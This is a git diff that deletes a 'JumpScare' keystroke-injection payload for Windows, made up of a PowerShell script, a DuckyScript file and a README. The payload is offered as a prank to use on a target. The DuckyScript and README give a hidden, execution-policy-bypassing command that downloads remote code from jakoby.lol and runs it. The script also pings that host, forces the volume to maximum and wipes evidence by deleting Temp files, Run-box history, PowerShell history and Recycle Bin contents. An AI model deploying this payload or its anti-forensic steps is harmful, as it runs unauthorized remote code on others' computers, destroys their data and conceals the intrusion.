diff --git a/Payloads/Flip-JumpScare/JumpScare.ps1 b/Payloads/Flip-JumpScare/JumpScare.ps1 deleted file mode 100644 index 323a3b3..0000000 --- a/Payloads/Flip-JumpScare/JumpScare.ps1 +++ /dev/null @@ -1,217 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.NOTES - This script can be run as is with the provided execution file -.DESCRIPTION - This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level - Upon running this script it will immediately pause after the downloads until a mouse movement is detected - The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready - After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play -#> - -############################################################################################################################################################ - -# Download Image; replace link to $image to add your own image - -$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png" - -$i = -join($image,"?dl=1") -iwr $i -O $env:TMP\i.png - -iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png - -# Download WAV file; replace link to $wav to add your own sound - -$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true" - -$w = -join($wav,"?dl=1") -iwr $w -O $env:TMP\s.wav -iwr "https://jakoby.lol/hak5" -EA 0 >$null - - -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This will take the image you downloaded and set it as the targets wall paper -#> - -Function Set-WallPaper { - -<# - - .SYNOPSIS - Applies a specified wallpaper to the current user's desktop - - .PARAMETER Image - Provide the exact path to the image - - .PARAMETER Style - Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span) - - .EXAMPLE - Set-WallPaper -Image "C:\Wallpaper\Default.jpg" - Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit - -#> - - -param ( - [parameter(Mandatory=$True)] - # Provide path to image - [string]$Image, - # Provide wallpaper style that you would like applied - [parameter(Mandatory=$False)] - [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] - [string]$Style -) - -$WallpaperStyle = Switch ($Style) { - - "Fill" {"10"} - "Fit" {"6"} - "Stretch" {"2"} - "Tile" {"0"} - "Center" {"0"} - "Span" {"22"} - -} - -If($Style -eq "Tile") { - - New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force - New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force - -} -Else { - - New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force - New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force - -} - -Add-Type -TypeDefinition @" -using System; -using System.Runtime.InteropServices; - -public class Params -{ - [DllImport("User32.dll",CharSet=CharSet.Unicode)] - public static extern int SystemParametersInfo (Int32 uAction, - Int32 uParam, - String lpvParam, - Int32 fuWinIni); -} -"@ - - $SPI_SETDESKWALLPAPER = 0x0014 - $UpdateIniFile = 0x01 - $SendChangeEvent = 0x02 - - $fWinIni = $UpdateIniFile -bor $SendChangeEvent - - $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) -} - -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to pause the script until a mouse movement is detected -#> - -function Pause-Script{ -Add-Type -AssemblyName System.Windows.Forms -$originalPOS = [System.Windows.Forms.Cursor]::Position.X -$o=New-Object -ComObject WScript.Shell - - while (1) { - $pauseTime = 3 - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ - break - } - else { - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime - } - } -} - -#---------------------------------------------------------------------------------------------------- -<# - -.NOTES - This is to play the WAV file -#> - -function Play-WAV{ -$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync() -} - -#---------------------------------------------------------------------------------------------------- - -# This turns the volume up to max level -$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} - -#---------------------------------------------------------------------------------------------------- - -Pause-Script -Set-WallPaper -Image "$env:TMP\i.png" -Style Center -Play-WAV - -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue - -#---------------------------------------------------------------------------------------------------- - -# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off - -Add-Type -AssemblyName System.Windows.Forms -$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') - -#If true, toggle CapsLock key, to ensure that the script doesn't fail -if ($caps -eq $true){ - -$key = New-Object -ComObject WScript.Shell -$key.SendKeys('{CapsLock}') -} diff --git a/Payloads/Flip-JumpScare/JumpScare.txt b/Payloads/Flip-JumpScare/JumpScare.txt deleted file mode 100644 index 89186e3..0000000 --- a/Payloads/Flip-JumpScare/JumpScare.txt +++ /dev/null @@ -1,23 +0,0 @@ -REM Title: JumpScare - -REM Author: I am Jakoby - -REM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details - -REM Target: Windows 10, 11 - -REM Start by minimizing all their current windows -GUI m -DELAY 500 - -REM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly - -REM -------------------------------------------------------------------------------------- -REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. -REM -------------------------------------------------------------------------------------- - -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex -ENTER diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md deleted file mode 100644 index 5e65351..0000000 --- a/Payloads/Flip-JumpScare/README.md +++ /dev/null @@ -1,116 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# JumpScare - -A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. - -## Description - -This script starts off using Invoke-WebRequests to download both an Image and Sound file. -Their system volume is then turned up to the max level. -The script will be paused until a mouse movement is detected. -At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played. - -## Getting Started - -### Dependencies - -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -Arf - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) -* [PhilSutter](https://github.com/PhilSutter) - - -

(back to top)

diff --git a/Payloads/Flip-JumpScare/female_scream.wav b/Payloads/Flip-JumpScare/female_scream.wav deleted file mode 100644 index 67fce05..0000000 Binary files a/Payloads/Flip-JumpScare/female_scream.wav and /dev/null differ diff --git a/Payloads/Flip-JumpScare/jumpscare.png b/Payloads/Flip-JumpScare/jumpscare.png deleted file mode 100644 index 36c4cdb..0000000 Binary files a/Payloads/Flip-JumpScare/jumpscare.png and /dev/null differ